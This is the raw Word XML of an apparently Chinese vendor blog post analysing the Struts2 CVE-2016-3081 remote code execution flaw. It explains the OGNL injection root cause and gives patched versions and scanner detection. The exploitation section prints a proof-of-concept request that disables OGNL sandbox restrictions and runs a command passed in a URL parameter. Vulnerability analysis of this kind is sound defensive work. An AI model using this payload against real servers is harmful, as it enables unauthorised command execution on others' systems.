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B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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2016年4月21日Struts2官方发布两个CVE，其中CVE-2016-3081官方评级为高。主要原因为在用户开启动态方法调用的情况下，会被攻击者实现远程代码执行攻击。从目前搜索的情况来看，国内开启这个功能的网站不在少数，所以这个“Possible Remote Code Execution”漏洞的被打的可能性还是很高的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="001203B2">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>文章目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        <w:ind w:left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hyperlink r:id="rId8" w:anchor="0x01" w:tooltip="0x01 漏洞原理" w:history="1">
        <w:r w:rsidRPr="001203B2">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>0x01 漏洞原理</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        <w:ind w:left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hyperlink r:id="rId9" w:anchor="0x02" w:tooltip="0x02 漏洞利用" w:history="1">
        <w:r w:rsidRPr="001203B2">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>0x02 漏洞利用</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        <w:ind w:left="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hyperlink r:id="rId10" w:anchor="0x03" w:tooltip="0x03 漏洞总结" w:history="1">
        <w:r w:rsidRPr="001203B2">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>0x03 漏洞总结</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        <w:ind w:left="360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9"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:anchor="i" w:tooltip="检测与防护" w:history="1">
        <w:r w:rsidRPr="001203B2">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="9F9F9F"/>
            <w:kern w:val="0"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>检测与防护</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2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42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001203B2">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="004738"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0x01 漏洞原理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直接进行版本比对，我们可以看到针对这个问题，只对DefaultActionMapper.java这个文件进行了修改，修改内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="30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203B2">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="4C4C4C"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2076019B" wp14:editId="6A28496F">
            <wp:extent cx="5580380" cy="3490350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="compar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9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B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="194" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="center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proofErr w:type="gramStart"/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compare</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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我们可以看到只是把method成员变量的值进行了一次过滤，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cleanupActionName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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这个方法是在对“action:”滥用的问题进行添加的，禁止了绝大多数的特殊字符。但是在后来的版本变更中忽略了之前的问题，将method也引入了OGNL表达式（Object Graph Navigation Library），代码在DefaultAction.java的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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invokeAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001203B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中：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protected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invokeAction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(Object action,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ActionConfig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actionConfig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 throws Exception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lastRenderedPageBreak/>
        <w:t xml:space="preserve">       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proxy.getMethod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if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(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LOG.isDebugEnabled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())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LOG.debug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"Executing action method = #0",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}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timerKey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"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invokeAction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: " +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proxy.getActionName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try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</w:t>
      </w:r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UtilTimerStack.push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spellStart"/>
      <w:proofErr w:type="gram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timerKey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Object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methodResult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try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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775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   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methodResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ognlUtil.getValue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+ "()",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getStack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().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getContext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(), action);</w:t>
      </w:r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我们可以看到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methodName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被带入到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getValue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了，熟悉Struts相关漏洞的朋友应该都明白这是什么意思，虽然后面被强制添加了一对圆括号，但是想办法语法补齐就好了。相对应的我们来看下在2.3.18版本之前的代码是怎么处理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methodName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的：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protected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invokeAction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(Object action,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ActionConfig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actionConfig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 throws Exception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</w:t>
      </w:r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thodName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proxy.getMethod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if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(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LOG.isDebugEnabled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())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LOG.debug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"Executing action method = #0",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}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String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timerKey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"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invokeAction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: " +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proxy.getActionName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try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{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</w:t>
      </w:r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UtilTimerStack.push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spellStart"/>
      <w:proofErr w:type="gram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timerKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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);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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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methodCalled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false;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Object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methodResult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null;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Method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null;</w:t>
      </w:r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try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{</w:t>
      </w:r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               </w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
      <w:proofErr w:type="gram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 =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getAction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().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getClass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().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getMethod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(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methodName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, EMPTY_CLASS_ARRAY);</w:t>
      </w:r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lastRenderedPageBreak/>
        <w:t>在这里使用的是反射，所以在这个漏洞发布的时候，我曾一瞬间觉得又是一个骗CVE的鸡肋，但是事实上，这是一个威胁很大的漏洞。但是官方说的受影响版本Struts 2.0.0 –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Struts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Struts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2.3.28 (except 2.3.20.2 and 2.3.24.2)是不严谨的，应该是2.3.18-2.3.28(except 2.3.20.2 and 2.3.24.2)。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="666666"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ez-toc-section"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="004738"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0x02 漏洞利用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利用方式主要难点在于两个地方，一个是上文提到的对于表达式最后的圆括号给予正确的表达式意义。另一个就是在传输过程中method会经过一次转义，双引号和单引号的没有办法使用了，所以需要找到一个绕过。剩下的就是原来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套沙盒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绕过，命令执行的那套东西了。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 xml:space="preserve">对于圆括号，可以直接使用new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</w:rPr>
        <w:t>java.lang.String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t xml:space="preserve">这样来拼接成new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</w:rPr>
        <w:t>java.lang.String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t>()构成正确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</w:rPr>
        <w:t>Ognl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t>语法。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至于不能使用印好的话，命令执行我们可以使用引用参数的方法来完成对字符串的提取，例如：使用#parameters.cmd来提取http的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</w:rPr>
        <w:t>cmd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t>参数。测试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</w:rPr>
        <w:t>PoC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</w:rPr>
        <w:t>如下：</w:t>
      </w:r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 xml:space="preserve">http://172.16.107.143:8080/Struts2_3_18/hello.action?cmd=gedit&amp;method:(%23_memberAccess).setExcludedClasses(@java.util.Collections@EMPTY_SET),(%23_memberAccess).setExcludedPackageNamePatterns(@java.util.Collections@EMPTY_SET),%23cmd%3d%23parameters.cmd,%23a%3dnew%20java.lang.ProcessBuilder(%23cmd).start().getInputStream(),new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001203B2">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>java.lang.String</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsid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3"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pP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效果如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline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/>
          <w:noProof/>
          <w:color w:val="4C4C4C"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06D8F9CC" wp14:editId="4CF3AA66">
            <wp:extent cx="5580380" cy="4822605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="pw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B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:pStyle w:val="wp-caption-text"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="194" w:beforeAutospacing="0" w:after="194" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="center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pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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这里小小的猜测一下，官方发布的日期是20，而漏洞提交team做宣传是在4月25日，那么是不是在提交CVE时还没有完成谈计算器的利用，还是为了符合漏洞提交规范做的延时？小八卦一下O(∩_∩)O。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="666666"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ez-toc-section"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="004738"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0x03 漏洞总结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虽然现在CVE已经发布，但是从目前网络情况上（twitter和微博）来看，并没有安全研究人员关注到这两个CVE，可能是因为官方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发不过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太多鸡肋的CVE了，国内的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各路炒洞高手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已经对Struts2麻木了。所以目前的情况是属于漏洞存在那里，发了CVE，但是没有任何人去研究利用，发布相关分析。这个漏洞和Struts2前N次被炒的热热闹闹的漏洞影响和危害相比，真是不可同日而语，这个漏洞真的很实在。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看到这里，打算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磨拳擦掌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要去调回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显观点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验证程序的朋友们，这里要在提醒一次。虽然我在之前说了存在这个问题的站点很多，但是这个漏洞存在版本限制，在Struts2.3.18及其以上的版本才可以触发。而国内大多数的站点由于Struts在2.3.16之后再也没有出现过大的问题，所以绝大多数停留在2.3.16这个版本，这让这个看似很不错的漏洞略显鸡肋了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="666666"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ez-toc-section"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>检测与防护</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:pStyle w:val="a8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绿盟科技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WEB应用漏洞扫描系统（NSFOCUS WVSS）作为网站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安全运维人员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的应用安全评估利器，帮助用户构建从急到缓的修补流程，在漏洞被曝出时，第一时间内实现此漏洞的检测技术，发布了应急插件版本V6.0R03F00.39 ，提醒已有WVSS的广大用户对所管理的网站进行风险评估，全面发现潜在风险，快速修补！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline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/>
          <w:noProof/>
          <w:color w:val="4C4C4C"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49F364BB" wp14:editId="196C4575">
            <wp:extent cx="5105400" cy="4826000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="绿盟WEB应用漏洞扫描系统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绿盟WEB应用漏洞扫描系统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3B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:pStyle w:val="wp-caption-text"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="194" w:beforeAutospacing="0" w:after="194" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="center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</w:rPr>
        <w:t>绿盟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</w:rPr>
        <w:t>WEB应用漏洞扫描系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2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微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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</w:rPr>
        <w:t>官方也已经推出了2.3.20.2、2.3.24.2和2.3.28.1修复了这个问题，大家可以针对自己所使用的版本进行升级。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>升级下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:anchor="struts23281" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="4C4C4C"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>https://struts.apache.org/download.cgi#struts23281</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001203B2" w:rsidRPr="001203B2" w:rsidRDefault="001203B2" w:rsidP="001203B2">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="36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13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001203B2" w:rsidRPr="001203B2" w:rsidSect="00B07B2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A5" w:rsidRDefault="00B055A5" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B055A5" w:rsidRDefault="00B055A5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1203B2">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>5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1203B2">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>5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A5" w:rsidRDefault="00B055A5" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B055A5" w:rsidRDefault="00B055A5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055A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B055A5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055A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0640"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE8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32BE"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000D26B6"/>
    <w:rsid w:val="001203B2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B32B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55A5"/>
    <w:rsid w:val="00B07B2B"/>
    <w:rsid w:val="00B36581"/>
    <w:rsid w:val="00B44B7F"/>
    <w:rsid w:val="00BD72E3"/>
    <w:rsid w:val="00BE1662"/>
    <w:rsid w:val="00BF4FA9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736AD49-E862-4881-8379-94A0E8E1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1203B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0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203B2"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs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1203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ez-toc-title">
    <w:name w:val="ez-toc-title"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="001203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203B2"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ez-toc-section">
    <w:name w:val="ez-toc-section"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001203B2"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="wp-caption-text">
    <w:name w:val="wp-caption-text"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="001203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203B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155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57068416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8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420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7413">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="3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88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sfocus.net/struts2-method-calls-remote-code-execution-vulnerability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ruts.apache.org/download.cg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log.nsfocus.net/wp-content/uploads/2016/04/compare.jpg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nsfocus.net/wp-content/uploads/2016/04/%E7%BB%BF%E7%9B%9FWEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E7%B3%BB%E7%BB%9F.pn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nsfocus.net/struts2-method-calls-remote-code-execution-vulnerability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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.nsfocus.net/struts2-method-calls-remote-code-execution-vulnerability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log.nsfocus.net/struts2-method-calls-remote-code-execution-vulnerability/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.nsfocus.net/wp-content/uploads/2016/04/pwn.jpg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4435-497C-4D00-A6FB-8E394F6A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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-06T16:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-06T16:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>